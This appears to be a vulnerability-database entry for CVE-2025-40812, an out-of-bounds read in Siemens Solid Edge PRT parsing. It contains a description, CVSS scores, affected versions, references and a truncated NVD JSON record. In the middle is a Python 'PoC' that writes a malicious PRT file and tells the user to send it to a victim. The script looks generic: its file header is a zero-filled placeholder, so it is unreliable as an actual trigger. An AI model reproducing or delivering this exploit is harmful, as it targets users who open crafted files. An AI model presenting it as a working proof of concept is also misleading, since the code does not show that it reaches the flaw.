CVE-2025-40812

Description

A vulnerability has been identified in Solid Edge SE2024 (All versions < V224.0 Update 14), Solid Edge SE2025 (All versions < V225.0 Update 6). The affected applications contains an out of bounds read vulnerability while parsing specially crafted PRT files. This could allow an attacker to crash the application or execute code in the context of the current process.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:siemens:solid_edge_se2024:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:siemens:solid_edge_se2024:224.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0001:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00010:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00011:*:*:*:*:*:* - VULNERABLE

Solid Edge SE2024 < V224.0 Update 14

Solid Edge SE2025 < V225.0 Update 6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-40812 - Siemens Solid Edge PRT File Out-of-Bounds Read PoC
# This PoC demonstrates the creation of a malformed PRT file that triggers
# an out-of-bounds read vulnerability in Solid Edge SE2024/SE2025.

import struct
import sys

def create_malicious_prt(filename):
    """
    Create a malformed PRT file to trigger CVE-2025-40812.
    The vulnerability occurs when parsing specially crafted PRT files
    with out-of-bounds read conditions.
    """
    # PRT file header - mimicking Solid Edge Part file format
    header = b'\x00' * 16  # File signature/header placeholder

    # Crafted data section with abnormal length fields
    # to trigger out-of-bounds read during parsing
    crafted_data = b'\x41' * 1024  # Normal data fill

    # Inject malformed structure with oversized length field
    # This causes the parser to read beyond allocated buffer
    malformed_length = struct.pack('<I', 0xFFFFFF)  # Abnormally large length
    malformed_data = b'\x42' * 256

    # Combine to create malicious PRT file
    payload = header + crafted_data + malformed_length + malformed_data

    with open(filename, 'wb') as f:
        f.write(payload)

    print(f"[+] Malicious PRT file created: {filename}")
    print(f"[!] Send this file to a victim using Solid Edge SE2024/SE2025")
    print(f"[!] When opened, it triggers out-of-bounds read (CVE-2025-40812)")

if __name__ == "__main__":
    output_file = sys.argv[1] if len(sys.argv) > 1 else "exploit.prt"
    create_malicious_prt(output_file)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-40812
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-40812
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-40812/
[4] VulDB https://vuldb.com/cve/CVE-2025-40812
[5] https://cert-portal.siemens.com/productcert/html/ssa-541582.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-40812", "sourceIdentifier": "[email protected]", "published": "2025-10-14T10:15:40.090", "lastModified": "2025-10-16T13:50:53.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in Solid Edge SE2024 (All versions < V224.0 Update 14), Solid Edge SE2025 (All versions < V225.0 Update 6). The affected applications contains an out of bounds read vulnerability while parsing specially crafted PRT files. This could allow an attacker to crash the application or execute code in the context of the current process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:-:*:*:*:*:*:*:*", "matchCriteriaId": "893736B3-0140-4775-8700-CB9D7719DDE5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:-:*:*:*:*:*:*", "matchCriteriaId": "A0119E8F-1FAF-4A3B-B6E9-20F78360FC82"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0001:*:*:*:*:*:*", "matchCriteriaId": "829C4AEB-7C8D-408B-A79C-8684753F45E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00010:*:*:*:*:*:*", "matchCriteriaId": "8E262AB3-8C47-430A-9D42-89317CB630C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00011:*:*:*:*:*:*", "matchCriteriaId": "94758C94-F427-480E-A9F1-109D8660C4E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00012:*:*:*:*:*:*", "matchCriteriaId": "D084D11C-08FB-4EEE-A5E3-D93C10103D2A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00013:*:*:*:*:*:*", "matchCriteriaId": "F8A834C5-1E45-4087-A3A4-C059A2C9960C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0002:*:*:*:*:*:*", "matchCriteriaId": "1E8FB23E-280D-46FD-BD44-5D4552639E00"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0003:*:*:*:*:*:*", "matchCriteriaId": "CA2417A0-DD31-46FC-8D5A-9128B86C9352"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0004:*:*:*:*:*:*", "matchCriteriaId": "3CA9C494-767C-4CFA-AB07-106298B7B2C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0005:*:*:*:*:*:*", "matchCriteriaId": "C3738D73-82A5-41E4-8083-34611A6301BE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0006:*:*:*:*:*:*", "matchCriteriaId": "5634352F-0DD1-4731-9E43-61D0A9A40D1B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0007:*:*:*:*:*:*", "matchCriteriaId": "32E3D549-54F0-4909-830D-BDE8CDAD5AF7"}, {"vulnerable": true, "criteria": "cpe ... (truncated)